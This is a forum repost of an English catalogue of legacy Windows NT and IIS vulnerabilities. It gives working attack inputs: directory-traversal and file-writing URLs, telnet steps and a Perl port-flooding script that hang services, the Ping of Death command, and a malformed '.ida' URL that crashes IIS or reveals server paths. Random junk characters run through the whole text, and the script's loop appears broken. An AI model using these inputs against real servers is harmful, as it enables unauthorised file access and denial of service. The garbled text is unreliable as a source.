標(biāo)題: NT的漏洞及描述(英文) [打印本頁] 作者: 雜七雜八 時(shí)間: 2011-1-13 17:12 標(biāo)題: NT的漏洞及描述(英文) 受影響系統(tǒng):4.0,iis 1.0 % Y3 e/ r# j, W' `5 pA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory. 8 |9 C1 A Y9 N" k# X " g. l. a* |+ u% vA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.: K- [9 f; H' S- ` u) ?" d. J
; N9 ~7 a) ?! T9 Q& B& } _
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests. : l% _- v4 ~3 x6 b- A9 e- s2 q; |( n- F
--------------------------------------------------------------------* D- V2 ]' F4 o# Y5 J
2 T6 K0 F* U5 b1 Z2 `) d
受影響系統(tǒng):4.0 & ~1 v" l8 {* k( L4 R3 r. x5 r/ DA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''. 6 l" A# N0 j& n4 z + i' [0 f, K2 I4 j; q. y# i* L( |0 b* QIf the file 'target.bat' exists, the file will be truncated.: I% M) h1 d; Y# o3 u
P/ e* E1 K7 E# n + r* t- G$ z; D% zA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''. 5 r% E% e! p# m! _5 j1 D5 u- I* x V9 o+ u
----------------------------------------------------------------------: }2 ^! K4 l& e# d( `
4 g# c3 ?! C, b# H1 u2 G
受影響系統(tǒng):3.51,4.0+ b: p9 H; y. H% Z! n$ h/ D4 X" }
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.9 M- d$ E4 p8 d$ k! l. B# \2 q( g
# F7 h' \. e) M0 O/ j2 J! x
The following steps; . D: S2 O9 P1 U: z4 f0 R: J' d: U7 M, g
Telnet to an NT 4.0 system on port 135 ' A2 Z- i9 s% F' p8 q7 |, u8 ^
Type about 10 characters followed by a <CR> % M4 \( [. `, I/ a8 E3 NExit Telnet 4 h0 X9 j- a$ @4 f4 e% }results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.( ]1 U' ~+ u# U7 f, V% u8 B1 N
9 D6 X: _& L3 D- sWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted. / q& ]4 |" i `5 R: m0 D3 N) s/ X
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted." G- `9 Q8 P) E) c: P6 w
( Y6 D$ B, n( n4 G* L* M# Y! u# `
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning. ! B! P1 Y% o/ t2 ^" i7 G 7 A$ |* }6 g$ @/ I9 ~The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):0 C$ w+ ~2 j7 W- O
3 r3 e) ~9 Y' U# O6 o. g9 o/*begin poke code*/ + C# e% |% i$ X: K4 `$ C3 L$ }+ Y# l' [' X: G' ]7 c5 x4 E
use Socket; + F; A& G1 Z8 [: ruse FileHandle; , o0 C! `* O4 ~ |5 ~, ^require "chat2.pl"; / H& ]$ Z- ?# W! H! c! N; L4 O: r5 v, l
$systemname = $ARGV[0] && shift;# }/ k# H+ w/ p5 D0 n7 J/ [9 i2 T
- O1 G/ }) n+ E/ d. s1 ]
$verbose = 1; # tell me what you're hitting/ B0 ?2 F2 i& ^* E6 p: v
$knownports = 1; # don't hit known problem ports7 v& `7 M4 {1 J% b: i% {& X
for ($port = $0; $port<65535; $port++) ! e8 s8 {3 M' b- ]
{" Y4 g* o2 X) K1 y" E
' }/ x' O2 [/ o5 D$ |) a$ p9 d% x! ^: p7 v6 k( m) w" d
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {9 z X2 J% T1 B0 V
next;4 u1 k( {1 ^# f8 m1 J* x
} ~' p% _8 @; p8 N. B0 }$fh = chat::open_port($systemname, $port); . k2 s* x, ^8 O& `chat::print ($fh,"This is about ten characters or more"); ) D4 ]6 D( l# }# B! xif ($verbose) { / [) j$ H4 {( u2 G* Xprint "Trying port: $port\n"; 1 \; U* T6 Y; t" Q} * w Y7 m, A0 z8 ~. g1 C
chat::close($fh); , E" c5 b( L- C( Z: K! i' g8 v% |; K" H
} ) ]6 [8 v5 l# V y8 ~ 5 e R+ k: p0 z5 u 3 ?4 K! u+ l% {/*end poke code*/ ! p: |. {2 @- g) {8 f+ b 6 s+ e$ ~" ?! F. J' ]; k7 ?) ]Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername0 S- W) P" ~1 b9 }
7 x9 d0 I6 k& j0 F$ k-------------------------------------------------------------------------------- 5 T% @8 a; B' M9 G7 q: p6 R" C + K* f, W; |7 {) O D0 Y- {; ]受影響系統(tǒng):4.0' [7 ~: M4 H: p p+ p
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS. w. }4 _7 ~2 Y8 {: p' R, k- h - K D* e0 h; _, vThis attack causes Dr. Watson to display an alert window and to log an error: 8 B" ?0 A, N( @7 c6 {/ ^
! X4 B6 G$ o9 B+ k8 Z
"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT" + z, ?" V7 `4 y. W0 @7 i% E$ F+ j8 a. w0 p
-------------------------------------------------------------------------------- 7 H) o9 |" }9 X" j( o 5 P3 Q/ j; `/ }4 ^受影響系統(tǒng):3.51,4.0* r! F& w3 n" r+ r: F* |
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:( O1 E1 a* \: `5 l
. _- g$ i+ K! j: n5 hSTOP: 0x0000000A2 _" N, `; j. }
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS/ ~2 p) P; i/ `9 d% x% x
) @! y, L# l- a. T- Z7 S. `9 |; @
NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets. ~/ L6 Y' ~3 h' Y 9 A3 v' Y4 P: y& a+ x--------------------------------------------------------------------------------+ M7 J t a5 |+ ~: Y7 O9 p( r
+ j1 h" p+ w& {9 x6 ~Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). ' j; ~! U3 s- Q0 C3 i& d 8 C$ [, K3 J3 F, ~8 j7 m& q-------------------------------------------------------- - [) ?3 t' d8 N1 _( o2 q4 h3 N) @; O
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server